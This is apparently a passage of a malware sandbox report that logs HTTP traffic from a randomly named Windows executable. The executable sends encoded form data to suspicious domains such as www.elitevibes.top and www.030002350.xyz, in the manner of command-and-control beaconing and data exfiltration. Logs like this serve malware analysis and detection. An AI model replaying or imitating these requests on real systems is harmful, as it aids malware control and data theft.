                                                                                                            Data Ascii: YdDTnh=fx8VmIcLsTYmxBCS+SRRcXnMt3GPeAz1znJ3+MrVg2n6zl41f3zDw+HFtOtm1Xg+2D5RkcNY0uAkBIZtgGr5Pn/J+zf35szEmeiDzcl5oP4F4T5msFHa7/33nF91VkPc8Vsfn4jcHekzGn68S/HJz5af0q1ScCb0yoU3W+8MNL5iT7UttIYgy7GPgfGHXsf8K6dxQSCE5zsqnLwIqPlgDaPoO99MsVHf83p4iuRCsSXe/c7Wck0a9QEHIYfljw2GIgaMqQVAaObS3nkITKtFPwFbDO9+LLhDDTHzsZ6p2sSeyrciB3DXig7fk/X9WHrFTVGHVo+R/81rlMnNGdtQg3dpMt54kTtQuDetIFoJwK6VMDOIDlTIaJ9W4orQHbf/vZS95qKvQZwfWyu44NyFeCqFqH/OoJSsFXUhCIjesU4FXNZgCAYCdFC1/AFk1a97fNbi2i+HCWxIFr6OJ+JVZFTN5LnD9NJR0bNL7GGBEo7o+0qkg1AdY2+eobZWsLU0aaN6bML55PbA88Hy720IqMN72Px0eRrv7twsgVMF0gC601PxxAj2miAMaKGZF9+j6wLc0EQhfpUJ/AdTsbsprf+SMRJAVZcS6slhQmS6Y9g7JuJW0Vhc2G6/aD+qgunAHAhwhD+FvtWZyMzq4OXiRWldR5eehSMm2LQzlkta0fo+G9vGig9cJ7VAJAYG4v3NCcEoK398x/8XPZ7fhL4Vh+qpGHPan4GF0yzoEPPC0+8+/MFULfjivHGcDlmrczxymd8za1CmTAwEPd+kZl6842aNUpkt6IbE5zBwDD5dgXM/WlzYOEa7JTVhGSqdtuTefjrqc0Vyh84ZgdA4gK711Goo1y/YwjiA7/N4kyVsSH8IQgnd+eQYKlsEBqrvhPT8T8qZwU+mWJW10gABSQ35VtJmTsfX7GEwu7S1NikKU4oU3d/ud3KBWzpgDx7BPirEMxzbZHvagS1Nv9ClA4Ce/Qk0+klFptycZYpp8zYqXI7vy [TRUNCATED]
                                                                                                            Dec 12, 2024 21:49:42.990283966 CET1236INHTTP/1.1 404 Not Found
                                                                                                            Server: nginx
                                                                                                            Date: Thu, 12 Dec 2024 20:49:42 GMT
                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Vary: Accept-Encoding
                                                                                                            ETag: W/"66cce1df-b96"
                                                                                                            Content-Encoding: gzip
                                                                                                            Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                                                                                                            Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc
                                                                                                            Dec 12, 2024 21:49:42.990377903 CET370INData Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                                                                                                            Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            16192.168.2.450012161.97.142.144805728C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Dec 12, 2024 21:49:44.407048941 CET510OUTGET /1a7n/?-n-l=OFJhRZgx2zhDqHF&YdDTnh=SzU1l/tTxwo1yS+S+GBkbH76tCzhfB/g3n0B8tGNiWfp8ksCFQPrr+3wpvFapjtE3GYokdEi3N4/HopXjg+LHnHi2Aut5Kfel96F5pIIk9Rh6xpkwimlquw= HTTP/1.1
                                                                                                            Host: www.030002350.xyz
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Connection: close
                                                                                                            User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/44.0.2403.67 Mobile/12H143 Safari/600.1.4
                                                                                                            Dec 12, 2024 21:49:45.654665947 CET1236INHTTP/1.1 404 Not Found
                                                                                                            Server: nginx
                                                                                                            Date: Thu, 12 Dec 2024 20:49:45 GMT
                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                            Content-Length: 2966
                                                                                                            Connection: close
                                                                                                            Vary: Accept-Encoding
                                                                                                            ETag: "66cce1df-b96"
                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 [TRUNCATED]
                                                                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;color: #5d5d5d;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial,"Noto Sans", sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol","Noto Color Emoji";text-shadow: 0px 1px 1px rgba(255, 255, 255, 0.75);text-align: center;}h1 {font-size: 2.45em;font-weight: 700;color: #5d5d5d;letter-spacing: -0.02em;margin-bottom: 30px;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;}.info {color: #5594cf;fill: #5594cf;}.error [TRUNCATED]
                                                                                                            Dec 12, 2024 21:49:45.654725075 CET1236INData Raw: 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 63 39 32 31 32 37 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 77 61 72 6e 69 6e 67 20 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 66 66 63 63 33 33 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 66 66 63 63 33 33 3b 0a 09 09
                                                                                                            Data Ascii: ;fill: #c92127;}.warning {color: #ffcc33;fill: #ffcc33;}.success {color: #5aba47;fill: #5aba47;}.icon-large {height: 132px;width: 132px;}.description-text {color: #707
                                                                                                            Dec 12, 2024 21:49:45.654742956 CET698INData Raw: 39 34 31 20 32 31 36 20 32 39 36 76 34 63 30 20 36 2e 36 32 37 20 35 2e 33 37 33 20 31 32 20 31 32 20 31 32 68 35 36 63 36 2e 36 32 37 20 30 20 31 32 2d 35 2e 33 37 33 20 31 32 2d 31 32 76 2d 31 2e 33 33 33 63 30 2d 32 38 2e 34 36 32 20 38 33 2e
                                                                                                            Data Ascii: 941 216 296v4c0 6.627 5.373 12 12 12h56c6.627 0 12-5.373 12-12v-1.333c0-28.462 83.186-29.647 83.186-106.667 0-58.002-60.165-102-116.531-102zM256 338c-25.365 0-46 20.635-46 46 0 25.364 20.635 46 46 46s46-20.636 46-46c0-25.365-20.635-46-46-46z"


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            17192.168.2.45002566.29.149.46805728C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Dec 12, 2024 21:49:51.284840107 CET775OUTPOST /a5zo/ HTTP/1.1
                                                                                                            Host: www.elitevibes.top
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Origin: http://www.elitevibes.top
                                                                                                            Referer: http://www.elitevibes.top/a5zo/
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Cache-Control: max-age=0
                                                                                                            Content-Length: 203
                                                                                                            Connection: close
                                                                                                            User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/44.0.2403.67 Mobile/12H143 Safari/600.1.4
                                                                                                            Data Raw: 59 64 44 54 6e 68 3d 4c 37 39 76 48 6e 79 2f 59 51 68 73 66 46 6c 6f 62 37 75 38 6f 55 73 7a 72 68 72 65 59 47 50 56 61 70 39 38 43 54 31 37 32 59 6a 66 72 56 72 41 55 4d 68 57 4c 6e 52 51 76 52 76 78 4e 31 7a 46 70 6e 56 56 33 41 6a 2b 68 64 7a 50 4a 37 31 4c 6a 6c 34 57 62 58 49 59 75 76 75 34 57 73 4c 32 4d 63 46 51 50 57 48 6c 5a 31 4e 53 31 79 46 46 75 63 42 57 31 6c 35 72 77 48 70 6d 64 58 41 32 43 6b 53 36 66 5a 66 44 38 4e 55 76 43 61 64 72 73 6e 74 41 4f 30 69 57 65 34 57 75 66 76 78 58 51 39 73 33 32 5a 55 70 39 34 45 50 6d 33 66 32 6c 51 34 4c 6c 48 33 79 69 4c 44 59 65 2f 7a 79 61 51 3d 3d
                                                                                                            Data Ascii: YdDTnh=L79vHny/YQhsfFlob7u8oUszrhreYGPVap98CT172YjfrVrAUMhWLnRQvRvxN1zFpnVV3Aj+hdzPJ71Ljl4WbXIYuvu4WsL2McFQPWHlZ1NS1yFFucBW1l5rwHpmdXA2CkS6fZfD8NUvCadrsntAO0iWe4WufvxXQ9s32ZUp94EPm3f2lQ4LlH3yiLDYe/zyaQ==
                                                                                                            Dec 12, 2024 21:49:52.512181044 CET637INHTTP/1.1 404 Not Found
                                                                                                            Date: Thu, 12 Dec 2024 20:49:52 GMT
                                                                                                            Server: Apache
                                                                                                            Content-Length: 493
                                                                                                            Connection: close
                                                                                                            Content-Type: text/html
                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                                                                            Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            18192.168.2.45002666.29.149.46805728C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Dec 12, 2024 21:49:53.945494890 CET795OUTPOST /a5zo/ HTTP/1.1
                                                                                                            Host: www.elitevibes.top
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Origin: http://www.elitevibes.top
                                                                                                            Referer: http://www.elitevibes.top/a5zo/
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Cache-Control: max-age=0
                                                                                                            Content-Length: 223
                                                                                                            Connection: close
                                                                                                            User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/44.0.2403.67 Mobile/12H143 Safari/600.1.4
                                                                                                            Data Raw: 59 64 44 54 6e 68 3d 4c 37 39 76 48 6e 79 2f 59 51 68 73 4f 56 31 6f 65 59 47 38 74 30 73 38 6e 42 72 65 57 6d 50 52 61 70 42 38 43 57 4d 6d 31 72 48 66 72 30 62 41 56 49 4e 57 4d 6e 52 51 36 68 76 2b 4f 46 7a 4d 70 6e 70 64 33 42 66 2b 68 5a 62 50 4a 36 46 4c 67 53 73 58 61 48 49 61 37 2f 75 2b 5a 4d 4c 32 4d 63 46 51 50 57 53 79 5a 78 68 53 31 43 31 46 75 39 42 52 70 56 35 71 6e 33 70 6d 57 33 42 78 43 6b 54 74 66 62 37 35 38 50 38 76 43 66 35 72 74 32 74 48 45 30 69 51 42 6f 58 39 61 66 6f 67 65 2f 68 36 7a 36 67 59 7a 70 63 56 6e 78 53 73 30 68 5a 63 33 48 54 42 2f 4d 4b 73 54 38 4f 37 42 51 4a 32 30 47 79 57 68 61 64 63 33 75 71 6e 61 51 67 7a 5a 41 63 3d
                                                                                                            Data Ascii: YdDTnh=L79vHny/YQhsOV1oeYG8t0s8nBreWmPRapB8CWMm1rHfr0bAVINWMnRQ6hv+OFzMpnpd3Bf+hZbPJ6FLgSsXaHIa7/u+ZML2McFQPWSyZxhS1C1Fu9BRpV5qn3pmW3BxCkTtfb758P8vCf5rt2tHE0iQBoX9afoge/h6z6gYzpcVnxSs0hZc3HTB/MKsT8O7BQJ20GyWhadc3uqnaQgzZAc=
                                                                                                            Dec 12, 2024 21:49:55.205210924 CET637INHTTP/1.1 404 Not Found
                                                                                                            Date: Thu, 12 Dec 2024 20:49:54 GMT
                                                                                                            Server: Apache
                                                                                                            Content-Length: 493
                                                                                                            Connection: close
                                                                                                            Content-Type: text/html
                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                                                                            Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            19192.168.2.45002766.29.149.46805728C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Dec 12, 2024 21:49:56.600903034 CET10877OUTPOST /a5zo/ HTTP/1.1
                                                                                                            Host: www.elitevibes.top
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Origin: http://www.elitevibes.top
                                                                                                            Referer: http://www.elitevibes.top/a5zo/
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Cache-Control: max-age=0
                                                                                                            Content-Length: 10303
                                                                                                            Connection: close
                                                                                                            User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/44.0.2403.67 Mobile/12H143 Safari/600.1.4
                                                                                                            Data Raw: 59 64 44 54 6e 68 3d 4c 37 39 76 48 6e 79 2f 59 51 68 73 4f 56 31 6f 65 59 47 38 74 30 73 38 6e 42 72 65 57 6d 50 52 61 70 42 38 43 57 4d 6d 31 72 50 66 71 43 50 41 55 76 5a 57 4e 6e 52 51 37 68 76 71 4f 46 79 4d 70 6e 42 5a 33 42 53 46 68 66 66 50 49 5a 64 4c 30 33 41 58 54 48 49 61 35 2f 75 2f 57 73 4c 6a 4d 63 31 4c 50 57 43 79 5a 78 68 53 31 41 39 46 35 38 42 52 36 46 35 72 77 48 70 69 64 58 41 57 43 6c 36 59 66 62 2f 54 38 2b 63 76 42 2f 70 72 67 6b 46 48 47 55 69 53 43 6f 57 36 61 66 55 2f 65 2f 4e 63 7a 36 6b 2b 7a 70 34 56 6e 77 76 41 6b 53 64 36 6c 48 50 4a 76 4d 65 56 4c 4d 69 42 41 53 5a 32 2b 7a 6d 52 32 35 35 67 31 4f 50 59 4b 52 38 4b 49 58 32 4c 62 71 35 68 44 4b 55 63 31 49 6c 73 74 38 75 69 4e 6a 50 2b 4e 6e 2f 72 58 55 70 6f 69 38 74 63 77 46 62 68 38 42 62 4c 75 62 68 4b 2f 41 78 48 36 46 4c 6b 58 56 47 55 55 55 43 47 47 75 32 49 4e 76 35 67 70 47 48 55 57 72 30 32 6c 2b 4b 54 75 44 42 55 6a 5a 7a 50 48 2f 35 46 46 49 35 38 35 5a 71 2f 56 32 59 34 34 75 55 64 61 62 38 38 68 65 42 [TRUNCATED]
                                                                                                            Data Ascii: YdDTnh=L79vHny/YQhsOV1oeYG8t0s8nBreWmPRapB8CWMm1rPfqCPAUvZWNnRQ7hvqOFyMpnBZ3BSFhffPIZdL03AXTHIa5/u/WsLjMc1LPWCyZxhS1A9F58BR6F5rwHpidXAWCl6Yfb/T8+cvB/prgkFHGUiSCoW6afU/e/Ncz6k+zp4VnwvAkSd6lHPJvMeVLMiBASZ2+zmR255g1OPYKR8KIX2Lbq5hDKUc1Ilst8uiNjP+Nn/rXUpoi8tcwFbh8BbLubhK/AxH6FLkXVGUUUCGGu2INv5gpGHUWr02l+KTuDBUjZzPH/5FFI585Zq/V2Y44uUdab88heBeA/10etfITmC98c2TERZLJcMuFsteDNwcMo6jzrAisB+tHESsHkibXeIbTqN1S5B9rwRz9jduq29b1yqrmUwx32ZFiow43PRdIBkd1BcGezpWpEARCrUPWbq3oNq/Y5zqgFH4mJKZsHaUcbG7dqihQjObsnFbBPh11aH97nNXIgzG50a/D17uQYGyUDxaXQyDW8qNcuyEdU9uc67IgJj69hIAhuns85pvb1Xt0pmGRNPMoixjmCyGwrR6vvGGQiiS/tiCeoTrYJNmO6AAa5cmUqz3IxZOaV/Xo1Bn98dpNziBsxdMYy9FuK3JS2c2iy6XbKbZFgYI28euDCf26v/Gsv9ti/ZOd/McMXh+JaQrNiBzHBvqArfFOpLEPGRftVVwaUmu2LIKaarVKEJw5Z6vwI7zXWQwiM74Pb3QVLR2KJAW1glFW3WAueCf0Zlffz33xNihCBZJUbtPBXpzYA8ev1LCOoiUvbbrn1qtOFBgjXWWg4QIXMHhuZ478f5l7drPWnDpIqwMljEaRHpWBJ5y/pJrBJ3pHdzOKER47DKDzfV7vZAdDlCxrwfrATxDRWTWXQ9Ftb1kohOyZYpii6uRQib2oLjph/hM+QIucP16y/3yBQA5OHbqgTQZrD/dbBG5ANbGRFbfUKq7Ol6S9a/l3MEimTMmYExBn [TRUNCATED]
                                                                                                            Dec 12, 2024 21:49:57.911501884 CET637INHTTP/1.1 404 Not Found
                                                                                                            Date: Thu, 12 Dec 2024 20:49:57 GMT
                                                                                                            Server: Apache
                                                                                                            Content-Length: 493
                                                                                                            Connection: close
                                                                                                            Content-Type: text/html
                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                                                                            Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            20192.168.2.45002866.29.149.46805728C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Dec 12, 2024 21:49:59.267200947 CET511OUTGET /a5zo/?YdDTnh=G5VPERT9FhRGJhNIRpmoyXcxrAHSeRDYD481MD187sPPhEeAXpBmYE5VzzyVUlrKlAIY3hSLkfzvU4FcgkoVbU14woS6WrnDZ9EPDWXrZ28nzgl0lvFto1M=&-n-l=OFJhRZgx2zhDqHF HTTP/1.1
                                                                                                            Host: www.elitevibes.top
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Connection: close
                                                                                                            User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/44.0.2403.67 Mobile/12H143 Safari/600.1.4
                                                                                                            Dec 12, 2024 21:50:00.512592077 CET652INHTTP/1.1 404 Not Found
                                                                                                            Date: Thu, 12 Dec 2024 20:50:00 GMT
                                                                                                            Server: Apache
                                                                                                            Content-Length: 493
                                                                                                            Connection: close
                                                                                                            Content-Type: text/html; charset=utf-8
